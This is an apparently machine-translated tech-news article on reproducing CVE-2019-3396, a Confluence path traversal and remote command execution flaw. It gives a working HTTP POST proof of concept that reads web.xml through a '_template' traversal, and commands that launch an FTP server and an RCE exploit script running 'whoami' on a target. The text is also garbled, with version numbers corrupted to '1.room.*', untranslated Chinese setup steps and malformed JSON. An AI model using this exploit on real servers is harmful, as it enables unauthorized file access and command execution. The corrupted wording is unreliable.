Shulou(Shulou.com)05/31 Report--

Atlassian Confluence path traversal and command execution vulnerability CVE-2019-3396 how to reproduce, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Atlassian Confluence is a widely used wiki system in enterprises, and there is an unauthorized directory traversal vulnerability before version 6.14.2, through which an attacker can read arbitrary files or execute arbitrary commands using Velocity template injection.

Affect the version

Confluence 1.room.*, 2.room.*, 3.room.*, 4.room.*, 5.room.* Confluence 6.0.*, 6.1.*, 6.2.*, 6.3.*, 6.4.*, 6.5.* Confluence 6.6.*

< 6.6.12 Confluence6.7.*、6.8.*、6.9.*、6.10.*、6.11.* Confluence 6.12.* < 6.12.3 Confluence 6.13.* < 6.13.3 Confluence 6.14.* < 6.14.2 当前系统环境Confluence Server 6.10.2： 环境启动后，访问http://your-ip:8090会进入安装引导，选择"Trial installation" 之后会要求填写license key。 点击"Get an evaluation license"，（需gmail账号）去Atlassian官方申请一个Confluence Server的测试证书（不要选择Data Center和Addons）： 确认安装的ip 然后点击Next安装 。（建议使用4G内存以上的机器进行安装与测试）本人是8G亲测可以 配置系统管理员账户 装完成之后 新建一个话题，然后，其他宏>

Gadget connector

Edit and grab the bag

Arbitrary file reading

Send the following poc to read the file web.xml:

POST / rest/tinymce/1/macro/preview HTTP/1.1

Host: xxx.xxx.xxx:8090

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/plain, * / *; qroom0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/json; charset=utf-8

Content-Length: 168

Origin: http://xxx.xxx.xxx.xxx:8090

Connection: close

Referer: http://xxx.xxx.xxx.xxx:8090/pages/resumedraft.action?draftId=65587&draftShareId=3aae85b8-030c-44bb-b8f4-d33a1771591c

{"contentId": "786458", "macro": {"name": "widget", "body": "", "params": {"url": "https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}"

Command execution

Python-m pyftpdlib-p 21

Python RCE_exp.py http://xxx.xx.xx.xx:8090 "whoami"

After reading the above, have you mastered how to reproduce the Atlassian Confluence path traversal and command execution vulnerability CVE-2019-3396? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.